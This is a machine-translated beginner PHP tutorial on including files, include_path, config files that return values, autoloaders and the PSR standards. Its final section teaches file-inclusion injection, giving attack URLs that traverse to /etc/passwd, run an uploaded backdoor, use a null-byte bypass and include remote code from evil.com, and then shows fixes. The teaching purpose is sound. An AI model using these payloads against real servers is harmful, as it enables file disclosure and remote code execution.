📜 ⬆️ ⬇️

PHP for beginners. File attachment

image


In the continuation of the series "PHP for beginners", today's article will be devoted to how PHP searches and connects files.

Why and why


PHP is a scripting language, originally created for the quick sculpt of home pages (yes, yes, it was originally P ersonal H ome P age Tools), and later on it began to create shops, social networks and other crafts on the knee that go beyond the scope , but why am I - and the fact that the more functionality is encoded, the greater the desire to structure it correctly, get rid of code duplication, break into logical pieces and connect only when necessary (this is the same feeling that you had when you read it before it could be broken up into separate pieces). For this purpose in PHP there are several functions, the general meaning of which comes down to the connection and interpretation of the specified file. Let's look at the example of connecting files:

// file variable.php $a = 0; // file increment.php $a++; // file index.php include ('variable.php'); include ('increment.php'); include ('increment.php'); echo $a; 

If you run the script index.php , then PHP will all be consistently connected and executed:

 $a = 0; $a++; $a++; echo $a; // выведет 2 

When a file is connected, its code is in the same scope as the line in which it was connected, so all variables available in this line will be available in the included file. If classes or functions were declared in the included file, then they fall into the global scope (unless of course a namespace was specified for them).

If you connect a file inside a function, the included files will access the function scope, so the following code will also work:

 function() { $a = 0; include ('increment.php'); include ('increment.php'); echo $a; } a(); // выведет 2 

Separately, I note the magic constants : __DIR__ , __FILE__ , __LINE__ and others - they are tied to the context and executed before the inclusion occurs
The peculiarity of connecting files is that when connecting a file, parsing switches to HTML mode, for this reason, any code inside the included file must be enclosed in PHP tags:

 <?php // подключаемый код // ... // ?> 

If you have only PHP code in the file, then the closing tag is usually omitted in order not to accidentally forget which thread the characters after the closing tag, which is fraught with problems (I will tell you more about this in the next article).
Have you seen the site file for 10,000 lines? Already tears in the eyes (╥_╥) ...

File connection functions


As mentioned above, in PHP there are several functions for connecting files:


In fact, these are not exactly functions, they are special language constructs, and you can use not parentheses. Among other things, there are other ways to connect and execute files, but this is already digging, let it be for you "task with an asterisk";)
Let's look at the examples of the differences between require and require_once , take one echo.php file:

 <p>text of file echo.php</p> 

And we will connect it several times:

 <?php // подключит и выполнит файл // вернёт 1 require_once 'echo.php'; // файл не будет подключён, т.к. уже подключали // вернёт true require_once 'echo.php'; // подключит и выполнит файл // вернёт 1 require 'echo.php'; 

The result of the execution will be two connections of the echo.php file:

 <p>text of file echo.php</p> <p>text of file echo.php</p> 

There are a couple of directives that affect the connection, but you will not need them - auto_prepend_file and auto_append_file . These directives allow you to set files that will be connected before connecting all files and after running all scripts, respectively. I can't even come up with a “live” script when it may be required.

The task
auto_prepend_file and implement a script for using the auto_prepend_file and auto_append_file , you can only change them in php.ini , .htaccess or httpd.conf (see PHP_INI_PERDIR ) :)

Where is looking?


PHP searches for include files in directories specified in the include_path directive. This directive also affects the operation of the fopen() , file() , readfile() and file_get_contents() functions. The algorithm is quite simple - when searching for files, PHP checks each directory in turn from the include_path in turn, until it finds the included file, if it does not, it will return an error. To change the include_path from the script, use the set_include_path () function.

One important point to consider when setting the include_path is that various characters are used as the path separator in Windows and Linux - ";" and ":" respectively, so when specifying your directory, use the constant PATH_SEPARATOR , for example:

 // пример пути в linux $path = '/home/dev/library'; // пример пути в windows $path = 'c:\Users\Dev\Library'; // для linux и windows код изменение include_path идентичный set_include_path(get_include_path() . PATH_SEPARATOR . $path); 

When you write an include_path in the ini file, you can use environment variables like ${USER} :

include_path = ".:${USER}/my-php-library"


If you attach an absolute path (starting with "/") or relative (starting with "." Or "..") when connecting a file, the include_path directive will be ignored, and the search will be performed only by the specified path.
Perhaps it would be worthwhile to tell about safe_mode , but this is a long history (from version 5.4), and I hope you will not encounter it, but if you suddenly, so that you know what it was, but passed ...

Use return


I'll tell you about a small life-hack - if a plug-in file returns something using the return construction, then this data can be obtained and used, so you can easily organize the connection of configuration files, I will give an example for clarity:

 return [ 'host' => 'localhost', 'user' => 'root', 'pass' => '' ]; 

 $dbConfig = require 'config/db.php'; var_dump($dbConfig); /* array( 'host' => 'localhost', 'user' => 'root', 'pass' => '' ) */ 

Interesting facts, without which life was so good: if functions are defined in the included file, then they can be used in the main file regardless of whether they were declared before return or after
The task
Write code that will collect configuration from multiple folders and files. The file structure is as follows:

 config |-- default | |-- db.php | |-- debug.php | |-- language.php | `-- template.php |-- development | `-- db.php `-- production |-- db.php `-- language.php 

The code should work as follows:

  • if in the system environment there is a PROJECT_PHP_SERVER variable and it is equal to development , then all files from the default folder must be connected, the data is entered into the $config variable, then the files from the development folder are connected, and the received data must be erased with the corresponding items saved in $config
  • similar behavior if PROJECT_PHP_SERVER is equal to production (of course, only for the production folder)
  • if there is no variable, or it is set incorrectly, then only files from the default folder are connected.


Automatic connection


Constructs with the connection of files look very cumbersome, and also monitor their updating - even that present, check out a piece of code from the example of the article about exceptions :

 // load all files w/out autoloader require_once 'Education/Command/AbstractCommand.php'; require_once 'Education/CommandManager.php'; require_once 'Education/Exception/EducationException.php'; require_once 'Education/Exception/CommandManagerException.php'; require_once 'Education/Exception/IllegalCommandException.php'; require_once 'Education/RequestHelper.php'; require_once 'Education/Front.php'; 

The first attempt to avoid such “happiness” was the emergence of the __autoload function. To say more precisely, it was not even a specific function, you had to define this function yourself, and already with its help it was necessary to include the files we need by the class name. The only rule was that for each class a separate file should be created by the class name (i.e., myClass should be inside the file myClass.php ). Here is an example of the implementation of such a function __autoload() (taken from the comments to the official manual):

Class which we will connect:

 // класс myClass в отдельном файле myClass.php class myClass { public function __construct() { echo "myClass init'ed successfuly!!!"; } } 

The file that connects this class:

 // пример реализации // ищем файлы согласно директивы include_path function __autoload($classname) { $filename = $classname .".php"; include_once $filename; } // создаём класс $obj = new myClass(); 

Now about the problems with this function - imagine the situation that you are connecting a third-party code, and there someone has already registered the __autoload() function for your code, and voila:

 Fatal error: Cannot redeclare __autoload() 

To avoid this, a function was created that allows you to register an arbitrary function or method as a class loader - spl_autoload_register . Those. we can create several functions with an arbitrary name to load classes, and register them using spl_autoload_register . Now index.php will look like this:

 // пример реализации // ищем файлы согласно директивы include_path function myAutoload($classname) { $filename = $classname .".php"; include_once($filename); } // регистрируем загрузчик spl_autoload_register('myAutoload'); // создаём класс $obj = new myClass(); 

“Did you know?” Rubric: the first parameter spl_autoload_register() not mandatory, and calling the function without it, the spl_autoload function will be used as the loader, the search will be carried out in folders from include_path and files with the extension .php and .inc , but this the list can be expanded using the spl_autoload_extensions function
Now each developer can register his own loader, the main thing is that the class names do not match, but this should not be a problem if you use namespaces.
Since such an advanced functionality as spl_autoload_register() has long existed, the spl_autoload_register() function __autoload() already been declared as deprecated in PHP 7.1 , which means that this function will be completely removed in the foreseeable future (X_x)
Well, more or less, the picture cleared up, although, wait a minute, all registered loaders queued up as they were registered, respectively, if someone nakhimichil in his loader, instead of the expected result, you can get a very unpleasant bug. To prevent this from happening, adult smart guys described a standard that allows you to connect third-party libraries without problems, the main thing is that the organization of classes in them complies with the PSR-0 standard (10 years old as already) or PSR-4 . What is the essence of the requirements described in the standards:

  1. Each library must live in its own namespace (the so-called vendor namespace)
  2. A separate folder must be created for each namespace.
  3. Inside the namespace can be their subspaces - also in separate folders
  4. One class - one file
  5. The file name with the extension .php must exactly match the class name

Example from the manual:
Full class nameNamespaceBase directoryFull path
\ Acme \ Log \ Writer \ File_WriterAcme \ Log \ Writer./acme-log-writer/lib/./acme-log-writer/lib/File_Writer.php
\ Aura \ Web \ Response \ StatusAura \ Web/ path / to / aura-web / src //path/to/aura-web/src/Response/Status.php
\ Symfony \ Core \ RequestSymfony \ core./vendor/Symfony/Core/./vendor/Symfony/Core/Request.php
\ Zend \ AclZend/ usr / includes / Zend //usr/includes/Zend/Acl.php


The differences between these two standards are only in the fact that PSR-0 supports the old code without a namespace (i.e., prior to version 5.3.0), and PSR-4 is spared from this anachronism, and even avoids unnecessary nesting of folders.

Thanks to these standards, it became possible the emergence of such a tool as composer - the universal package manager for PHP. If someone missed, then there is a good report from pronskiy about this tool.


PHP injection


I also wanted to tell about the first mistake of everyone who makes a single entry point for the site in one index.php and calls it the MVC framework:

 <?php $page = $_GET['page'] ?? die('Wrong filename'); if (!is_file($page)) { die('Wrong filename'); } include $page; 

You look at the code, and you want something to send a malicious thread there:

 // получить неожиданное поведение системы http://domain.com/index.php?page=../index.php // прочитать файлы в директории сервера http://domain.com/index.php?page=config.ini // прочитать системные файлы http://domain.com/index.php?page=/etc/passwd // запустить файлы, которые мы заранее залили на сервер http://domain.com/index.php?page=user/backdoor.php 

The first thing that comes to mind is to forcefully add the .php extension, but in some cases this can be bypassed “thanks” to the zero byte vulnerability (read, this vulnerability has long been fixed , but suddenly you get an interpreter older than PHP 5.3, well, for general development also recommend):

 // прочитать системные файлы http://domain.com/index.php?page=/etc/passwd%00 

In modern versions of PHP, the presence of the zero byte character in the path of the included file immediately leads to a corresponding connection error, and even if the specified file exists and can be connected, there will always be an error, this is checked as follows strlen(Z_STRVAL_P(inc_filename)) != Z_STRLEN_P(inc_filename) (this is from the depths of PHP itself)
The second “worthwhile” thought is a check to find the file in the current directory:

 <?php $page = $_GET['page'] ?? die('Wrong filename'); if (strpos(realpath($page), __DIR__) !== 0) { die('Wrong path to file'); } include $page . '.php'; 

The third, but not the last modification of the check, is the use of the open_basedir directive, with its help you can specify the directory where PHP will look for the files to connect:

 <?php $page = $_GET['page'] ?? die('Wrong filename'); ini_set('open_basedir', __DIR__); include $page . '.php'; 

Be careful, this directive affects not only the connection of files, but also all the work with the file system, i.e. including this limitation, you must be sure that you have not forgotten anything outside the specified directory, neither the cached data nor any user files (although the functions is_uploaded_file() and move_uploaded_file() continue to work with the temporary folder for the downloaded files).
What other checks are possible? Lots of options, it all depends on the architecture of your application.

I also wanted to recall the existence of the “wonderful” directive allow_url_include (it has a dependency on allow_url_fopen ), it allows you to connect and execute remote PHP files, which is much more dangerous for your server:

 // подключаем удалённый PHP скрипт http://domain.com/index.php?page=http://evil.com/index.php 

They saw, remembered, and never use, the benefit is off by default. You will need this opportunity a little less than never, in all other cases, lay the correct application architecture, where different parts of the application communicate through the API.

The task
Write a script that allows you to connect php-scripts from the current folder by name, with the following to be aware of possible vulnerabilities and prevent slips.

Finally


This article is a basic foundation in PHP, so study carefully, do the tasks and do not filon; no one will teach for you.

PS


This is a repost from the PHP For Beginners series:


If you have comments on the material of the article, or perhaps on the form, then describe the essence in the comments, and we will make this material even better.

Source: https://habr.com/ru/post/439618/